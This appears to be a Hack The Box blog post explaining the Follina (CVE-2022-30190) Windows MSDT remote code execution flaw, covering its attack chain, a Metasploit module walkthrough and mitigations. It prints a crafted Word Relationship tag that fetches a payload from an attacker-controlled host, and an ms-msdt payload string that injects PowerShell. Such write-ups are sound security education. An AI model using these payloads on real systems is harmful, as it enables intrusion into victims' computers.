CVE-2022-30190 (Follina) explained

What is CVE-2022-30190? 

In late May 2022, the cybersecurity landscape buzzed with the discovery of CVE-2022-30190, also known as “Follina:” a Remote Code Execution (RCE) vulnerability found within the Microsoft Windows Support Diagnostic Tool (MSDT).

This RCE vulnerability caught the attention of security professionals and system administrators alike, as it had already been exploited in the wild. Microsoft swiftly provided mitigation guidance on May 30, but full patches weren't released until June 14.

Follina's discovery and subsequent exploitation unveiled a critical gap in the security fabric of Windows systems. 

In this post, we’ll delve into the technical details of its operation, the potential risks it poses, and the steps taken to mitigate its effects.

Train to exploit and defend against Follina for free on HTB Labs⚔️:  Outdated is a Medium difficulty Linux machine that features a foothold based on the "Follina" CVE of 2022. 

Folina-based forensic challenge for blue teamers🛡️: Play the Folina-based forensic challenge on HTB Labs, Diagnostic.

You'll act as part of a SOC team that has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document (your docker). Your job is to figure out what's going on.

MSDT and CVE-2022-30190

CVE-2022-30190, also known as Follina, is a critical vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT). MSDT is a built-in feature found in various Windows operating systems. Like a mechanic for your computer, it detects problems and conducts routine examinations to ensure smooth performance.

Now, envision a scenario where someone can mislead this mechanic into accidentally unlocking the doors to critical areas of your computer system. These doors could lead to valuable information or even control over essential functions. This is, in essence, what happened with CVE-2022-30190.

A vulnerability was discovered in MSDT that could grant unauthorized individuals access to vital components of a Windows system. They could manipulate, retrieve, or even destroy critical information through remote code execution.

This alarming revelation highlights the importance of the diagnostic tool itself and the need for its rigorous security measures. By understanding how the tool functions, we can further grasp the nature of the vulnerability and the way attackers could exploit it.

Understanding this flaw sheds light on the diagnostic tool’s significant role in system functionality and how a seemingly innocuous feature can become a gateway to potential risks.

Recommended read: Exploiting CVE-2023-4911 (Looney Tunables)

Vulnerability description

The core of CVE-2022-30190 lies in a flaw within Microsoft's Diagnostic Troubleshooting executable, msdt.exe, specifically in how MSDT processes malformed URIs, typically characterized by an unusual length and ending with '!'. 

This improper handling of such URIs is the crucial element that enables unauthorized command execution (and an intrinsic vulnerability in MSDT).

The most common delivery mechanism for Folina is through a Microsoft Word document. The malicious URI is too long to embed directly, so an HTML reference is downloaded automatically on open, and it uses JavaScript to invoke the malicious URI for MSDT.

This approach allows the attacker to bypass established security protocols like Office's Protected Mode and macro settings. 

Conditions for exploitation

Successful exploitation is contingent upon one of the following scenarios:

Preconditions

• Attack vector: Local with User Interaction (CVSSv3: AV:L/AC:L/PR:N/UI:R)

• Environment: Windows OS with Microsoft Office installed

• User privilege: The exploit executes arbitrary code with the privileges of the user who opens the malicious Word document.

Satisfying Exploitability Checks

• Document trustworthiness: The target must open a specially crafted Word document.

• HTTP callback: A web server under the attacker's control must be accessible to serve the secondary payload.

• Payload constraints: The secondary payload must surpass 4096 bytes to evade specific size checks.

• User interaction: Although opening or executing the document is generally required, certain formats like .rtf can trigger the exploit simply by being previewed.

Application State

• Office protected mode: Exploit remains effective even in Protected Mode.

• Macro Settings: The exploit operates independently of macro settings.

Attack Chain Overview

1. Initial vector: The attack commences with a Word document containing an external reference, specified via the Relationship tag in the word/_rels/document.xml.rels XML schema.

2. Secondary vector: This external reference fetches a malicious HTML payload from a remote web server when the document is opened.

Execution: The malicious HTML payload leverages the ms-msdt URI scheme to run arbitrary PowerShell commands.

Detailed exploitation steps

Stage 1: Document crafting

A malicious Relationship tag is embedded into the Word document's XML structure. Here's an example:

<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://10.0.0.28:8000/index.html!" TargetMode="External"/>

The Target attribute specifies the attacker-controlled HTTP server, hosting the secondary payload in an index.html file.

Stage 2: Secondary payload retrieval

Upon opening the Word document, the HTML payload is fetched and executed. The payload exploits the ms-msdt URI scheme to set up the PowerShell execution. It must exceed 4096 bytes for successful execution.

Stage 3: PowerShell execution

A key part of the payload is as follows:

ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bm90ZXBhZA=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"

This segment exploits the IT_BrowseForFile parameter to inject arbitrary PowerShell commands, eventually executing mpsigstub.exe located in the system directory.

Stage 4: Evasion & detection

At the time of writing, only a few antivirus engines flag this activity, making it stealthy and difficult to detect. Windows real-time protection is among the few defenses capable of stopping it. However, given the low detection rate, other evasion tactics could potentially be deployed.

Stage 5: Post-exploitation

The exploit culminates in the execution of mpsigstub.exe, operating with the local user's permissions. This could be a foundation for additional privilege escalation or lateral movement if coupled with other vulnerabilities.

The Follina vulnerability ingeniously exploits Microsoft Word's remote template feature, ms-msdt URI schemes, and msdt.exe's parameter handling. Its multi-stage nature and ability to bypass various security mechanisms make it a highly sophisticated and severe threat.

Metasploit module

There is a Metasploit module for Follina. The source code for it can be found on Packet Storm. 

This Metasploit module crafts a Microsoft Word document that, once loaded, leverages the remote template feature. By fetching an HTML document, it utilizes the ms-msdt scheme to carry out PowerShell code execution.

Let's break down what this Metasploit module is doing:

1. Creation of malicious components: The exploit generates three critical components: a malicious DOCX file, an HTML payload, and a JavaScript payload. The DOCX file is crafted using a default or user-specified MSF template.

2. DOCX manipulation: Between lines 126-160, the exploit modifies the document.xml.rels file within the DOCX (which is essentially a ZIP archive). It inserts a malicious MSDT URI, preparing the document to fetch the HTML payload.

3. HTML payload generation: The HTML payload is generated between lines 95-124 and is responsible for executing the embedded JavaScript. The JavaScript content, potentially obfuscated depending on user settings, is constructed to redirect the browser to the malicious URI using window.location.href, which triggers the PowerShell execution.

4. Hosting and payload delivery: The Metasploit module hosts the HTML payload on a web server. When the target opens the manipulated DOCX file, Microsoft Word attempts to download the HTML payload due to the alterations made in the document.xml.rels file. This is orchestrated between lines 162-189, with specific response handling for .html and .ps1 requests, facilitating the delivery of both HTML and PowerShell payloads.

5. PowerShell execution: The payload, once fetched, exploits the ms-msdt URI scheme to run arbitrary PowerShell commands, creating an execution gateway for the attackers.

6. Finalizing and packing DOCX: Around lines 191-224, the modified DOCX file is finished and packed, containing the necessary alterations and injected payload, ready to be delivered to the target with the filename specified in the module's datastore options.

7. Helper functions: Lastly, the module utilizes helper functions between lines 226-251 for URI normalization, random integer generation, and DOCX unpacking, assisting in the seamless execution of the exploit.

This modular approach, facilitated by the Metasploit Framework, exemplifies the ingenuity behind exploiting seemingly innocuous features in Microsoft Word. By leveraging remote templates, URI schemes, and PowerShell execution, it creates a sophisticated multi-layered attack mechanism.

By understanding the intricacies of this code, professionals can use it for legal penetration testing and to defend against such attacks.

Mitigation for CVE-2022-30190

Mitigating the Follina (CVE-2022-30190) vulnerability is paramount for securing your systems. Here's an easily digestible list of strategies to arm yourself against this threat:

1. Apply patch for CVE-2022-30190 to Windows systems:

• The best line of defense is to apply the Microsoft-provided patch.

• Note: test the patch in a development environment before deploying.

• Affected Windows systems: Windows Server 2022/2019/2016/2012 & 2012 R2/2008 R2, Windows 11/10/8.1, Windows 7 Service Pack 1.

2. Explore applying a workaround provided by Microsoft:

• If patching is delayed, Microsoft offers guidance for a workaround.

• Note: as with the patch, test the workaround in a dev environment first.

• Description: the vulnerability allows arbitrary code execution when MSDT is called using the URL protocol.

3. Utilize behavior detection and exploit prevention tools:

• Solutions like Kaspersky protect against this vulnerability through specific detection verdicts like HEUR:Exploit.MSOffice.Agent.gen, PDM:Exploit.Win32.Generic, etc.zz.

4. Disable support for the MSDT URL protocol:

• Prevent exploitation by disabling MSDT URL protocol.

• Back up the registry key with reg export HKEY_CLASSES_ROOT\ms-msdt filename.

• Delete the registry key with reg delete HKEY_CLASSES_ROOT\ms-msdt /f.

Stay ahead of threats with Hack The Box

Hack The Box provides a wide range of scenarios to keep your team’s skills sharp and up-to-date. Organizations like Toyota, NVISO, and RS2 are already using the platform to stay ahead of threats with hands-on skills and a platform for acquiring, retaining, and developing top cyber talent. Talk to our team to learn more. 

Train your team on the latest threats

Author bio: Kyser Clark (KyserClark), Cyber Defense Operations (1D771), United States Air Force (Active duty)  Kyser is a Cyber Defense Operations leader with over 5+ years of active duty U.S. Air Force experience specializing in offensive security, ethical hacking, penetration testing, and red teaming. His credentials include a Bachelor of Science (BS) in Cybersecurity Management & Policy from the University of Maryland Global Campus (UMGC), and 11 industry certifications: OffSec Certified Professional (OSCP), (ISC)² Certified Information Systems Security Professional (CISSP), eLearnSecurity Junior Penetration Tester (eJPT), EC-Council Certified Ethical Hacker (CEH), Cisco Certified Network Associate (CCNA), CompTIA PenTest+, Cybersecurity Analyst (CySA+), Cloud+, Linux+, Security+, and Network+.  Kyser encourages you to connect with him in these places in cyberspace: KyserClark.com LinkedIn Twitter